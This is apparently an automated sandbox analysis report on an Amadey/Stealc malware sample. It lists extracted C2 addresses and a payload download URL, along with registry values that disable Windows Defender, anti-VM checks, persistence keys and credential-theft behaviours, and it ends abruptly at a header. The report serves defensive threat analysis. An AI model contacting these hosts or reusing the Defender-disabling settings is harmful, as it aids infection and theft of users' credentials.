Analysis
-
max time kernel
147s -
max time network
148s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
26/03/2025, 07:12
Static task
static1
General
-
Target
72d706281b940ed3b12e2c1d2cdc9e0b.exe
-
Size
1.8MB
-
MD5
72d706281b940ed3b12e2c1d2cdc9e0b
-
SHA1
77b6bcdab4d139720480a472378a366553e22fa2
-
SHA256
806f318390f3fd7ed23c129362e0b11813dd3e86a8dd051352900b06ec193d8d
-
SHA512
de955a979fbbfe247c847c1d8f30394e8b8c62ed1fa37d3874211d3dafcda845867b0a2ee7be093778aee4de19b425796a8a8527a178c0bc9d084b49d2bbeef1
-
SSDEEP
49152:92/29CJu5qqezLla7PC1MfktJyRcdLMTrWJoljJ:w+QJwqflWC1mRwLMTrWm
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/3828-779-0x0000000000F40000-0x00000000013A2000-memory.dmp healer behavioral1/memory/3828-778-0x0000000000F40000-0x00000000013A2000-memory.dmp healer behavioral1/memory/3828-933-0x0000000000F40000-0x00000000013A2000-memory.dmp healer -
Gcleaner family
-
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" b43449a9e4.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection b43449a9e4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" b43449a9e4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" b43449a9e4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" b43449a9e4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" b43449a9e4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" b43449a9e4.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" b43449a9e4.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications b43449a9e4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" b43449a9e4.exe -
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ bd9c4316f2.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4ad709baae.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 72d706281b940ed3b12e2c1d2cdc9e0b.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e024e105da.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b43449a9e4.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempPTI4EMONM03TIM4TGWRMVCLOTK387W0L.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 221764ef7a.exe -
Blocklisted process makes network request 10 IoCs
flow pid Process 6 2768 powershell.exe 7 1728 powershell.exe 9 2812 powershell.exe 10 2812 powershell.exe 12 2812 powershell.exe 13 2812 powershell.exe 111 3892 powershell.exe 112 3892 powershell.exe 113 3892 powershell.exe 114 3892 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs
Run Powershell and hide display window.
pid Process 3728 powershell.exe 3892 powershell.exe 2768 powershell.exe 1728 powershell.exe 2716 powershell.exe 2812 powershell.exe 960 powershell.exe 2064 powershell.exe 1524 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 20 IoCs
flow pid Process 115 2864 rapes.exe 120 2864 rapes.exe 14 2864 rapes.exe 14 2864 rapes.exe 14 2864 rapes.exe 110 2936 221764ef7a.exe 110 2936 221764ef7a.exe 110 2936 221764ef7a.exe 110 2936 221764ef7a.exe 110 2936 221764ef7a.exe 110 2936 221764ef7a.exe 160 696 svchost015.exe 135 2864 rapes.exe 5 2864 rapes.exe 5 2864 rapes.exe 24 2864 rapes.exe 121 2864 rapes.exe 159 4004 svchost015.exe 6 2768 powershell.exe 7 1728 powershell.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 1752 takeown.exe 736 icacls.exe -
Stops running service(s) 4 TTPs
-
Uses browser remote debugging 2 TTPs 8 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 636 chrome.exe 3000 chrome.exe 1732 chrome.exe 2452 chrome.exe 3384 chrome.exe 3788 chrome.exe 3916 chrome.exe 3880 chrome.exe -
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e024e105da.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 221764ef7a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e024e105da.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 221764ef7a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b43449a9e4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion bd9c4316f2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion bd9c4316f2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 72d706281b940ed3b12e2c1d2cdc9e0b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 72d706281b940ed3b12e2c1d2cdc9e0b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b43449a9e4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4ad709baae.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempPTI4EMONM03TIM4TGWRMVCLOTK387W0L.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempPTI4EMONM03TIM4TGWRMVCLOTK387W0L.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4ad709baae.exe -
Executes dropped EXE 22 IoCs
pid Process 2864 rapes.exe 2332 f037f0daf3.exe 2936 TempPTI4EMONM03TIM4TGWRMVCLOTK387W0L.EXE 1084 Q1DOy22.exe 1440 483d2fa8a0d53818306efeb32d3.exe 2004 apple.exe 672 11.exe 1128 11.exe 2784 17e149dbfb.exe 1356 e024e105da.exe 2936 221764ef7a.exe 2472 65516ed6cf.exe 3828 b43449a9e4.exe 3860 Q1DOy22.exe 3280 7IIl2eE.exe 3292 Passwords.com 3448 f73ae_003.exe 3436 bd9c4316f2.exe 4004 svchost015.exe 1244 4ad709baae.exe 696 svchost015.exe 2936 ce9f45fe52.exe -
Identifies Wine through registry keys 2 TTPs 9 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine 221764ef7a.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine b43449a9e4.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine 4ad709baae.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine 72d706281b940ed3b12e2c1d2cdc9e0b.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine TempPTI4EMONM03TIM4TGWRMVCLOTK387W0L.EXE Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine e024e105da.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine bd9c4316f2.exe -
Loads dropped DLL 42 IoCs
pid Process 3036 72d706281b940ed3b12e2c1d2cdc9e0b.exe 2864 rapes.exe 2768 powershell.exe 2864 rapes.exe 1728 powershell.exe 2864 rapes.exe 2004 apple.exe 2004 apple.exe 2004 apple.exe 2004 apple.exe 2864 rapes.exe 2864 rapes.exe 2632 WerFault.exe 2632 WerFault.exe 2632 WerFault.exe 2632 WerFault.exe 2864 rapes.exe 2864 rapes.exe 2864 rapes.exe 2864 rapes.exe 2864 rapes.exe 2864 rapes.exe 2864 rapes.exe 2864 rapes.exe 2936 221764ef7a.exe 2936 221764ef7a.exe 2864 rapes.exe 3280 7IIl2eE.exe 3860 CMD.exe 2864 rapes.exe 2864 rapes.exe 2864 rapes.exe 3436 bd9c4316f2.exe 2864 rapes.exe 2864 rapes.exe 1244 4ad709baae.exe 2864 rapes.exe 2864 rapes.exe 3396 WerFault.exe 3396 WerFault.exe 3396 WerFault.exe 3396 WerFault.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 736 icacls.exe 1752 takeown.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features b43449a9e4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" b43449a9e4.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\e024e105da.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10338720101\\e024e105da.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\221764ef7a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10338730101\\221764ef7a.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\65516ed6cf.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10338740101\\65516ed6cf.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\b43449a9e4.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10338750101\\b43449a9e4.exe" rapes.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" Q1DOy22.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\f037f0daf3.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10338550101\\f037f0daf3.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10338560121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" Q1DOy22.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
flow ioc 10 bitbucket.org 113 bitbucket.org 114 bitbucket.org 8 bitbucket.org 9 bitbucket.org -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0007000000015ff5-28.dat autoit_exe behavioral1/files/0x000500000001970b-491.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 3760 tasklist.exe 4076 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
pid Process 3036 72d706281b940ed3b12e2c1d2cdc9e0b.exe 2864 rapes.exe 2936 TempPTI4EMONM03TIM4TGWRMVCLOTK387W0L.EXE 1440 483d2fa8a0d53818306efeb32d3.exe 1356 e024e105da.exe 2936 221764ef7a.exe 3828 b43449a9e4.exe 3436 bd9c4316f2.exe 1244 4ad709baae.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 3436 set thread context of 4004 3436 bd9c4316f2.exe 204 PID 1244 set thread context of 696 1244 4ad709baae.exe 207 -
Drops file in Program Files directory 46 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Windows Defender\en-US\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\en-US\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpAsDesc.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\en-US\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\MpOAV.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MpSvc.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MsMpCom.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\en-US\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpOAV.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MpRTP.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MsMpLics.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\en-US\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MSASCui.exe cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\MpAsDesc.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\MsMpLics.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpCommu.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MsMpRes.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\MpClient.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpClient.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpCmdRun.exe cmd.exe File opened for modification C:\Program Files\Windows Defender\MpEvMsg.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe -
Drops file in Windows directory 14 IoCs
description ioc Process File opened for modification C:\Windows\PotteryUser 7IIl2eE.exe File opened for modification C:\Windows\GentleLogging 7IIl2eE.exe File created C:\Windows\Tasks\rapes.job 72d706281b940ed3b12e2c1d2cdc9e0b.exe File opened for modification C:\Windows\LogisticsNotre 7IIl2eE.exe File opened for modification C:\Windows\JenniferSubdivision 7IIl2eE.exe File opened for modification C:\Windows\BrandonStat 7IIl2eE.exe File opened for modification C:\Windows\CorrectionsGeographic 7IIl2eE.exe File opened for modification C:\Windows\RowTopics 7IIl2eE.exe File opened for modification C:\Windows\SpecificsHeaven 7IIl2eE.exe File opened for modification C:\Windows\ProvidingMilwaukee 7IIl2eE.exe File opened for modification C:\Windows\WallpapersHo 7IIl2eE.exe File opened for modification C:\Windows\EstateLegislative 7IIl2eE.exe File opened for modification C:\Windows\DiscussedFacial 7IIl2eE.exe File opened for modification C:\Windows\EnglandDeleted 7IIl2eE.exe -
Launches sc.exe 38 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1524 sc.exe 2500 sc.exe 1692 sc.exe 1548 sc.exe 1796 sc.exe 2508 sc.exe 2604 sc.exe 1924 sc.exe 2024 sc.exe 2128 sc.exe 2372 sc.exe 2764 sc.exe 2384 sc.exe 836 sc.exe 264 sc.exe 2340 sc.exe 2708 sc.exe 2060 sc.exe 696 sc.exe 2556 sc.exe 852 sc.exe 1892 sc.exe 2068 sc.exe 1792 sc.exe 3044 sc.exe 2120 sc.exe 2108 sc.exe 856 sc.exe 612 sc.exe 1028 sc.exe 2916 sc.exe 2168 sc.exe 2244 sc.exe 560 sc.exe 1912 sc.exe 2124 sc.exe 1552 sc.exe 2428 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 50 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apple.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Passwords.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4ad709baae.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 65516ed6cf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 72d706281b940ed3b12e2c1d2cdc9e0b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 11.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 221764ef7a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b43449a9e4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 11.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 65516ed6cf.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 65516ed6cf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7IIl2eE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f037f0daf3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e024e105da.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bd9c4316f2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CMD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f73ae_003.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 221764ef7a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 221764ef7a.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 1296 timeout.exe 1604 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Kills process with taskkill 5 IoCs
pid Process 1800 taskkill.exe 1860 taskkill.exe 2548 taskkill.exe 1560 taskkill.exe 2808 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1780 schtasks.exe 1028 schtasks.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1128 11.exe -
Suspicious behavior: EnumeratesProcesses 54 IoCs
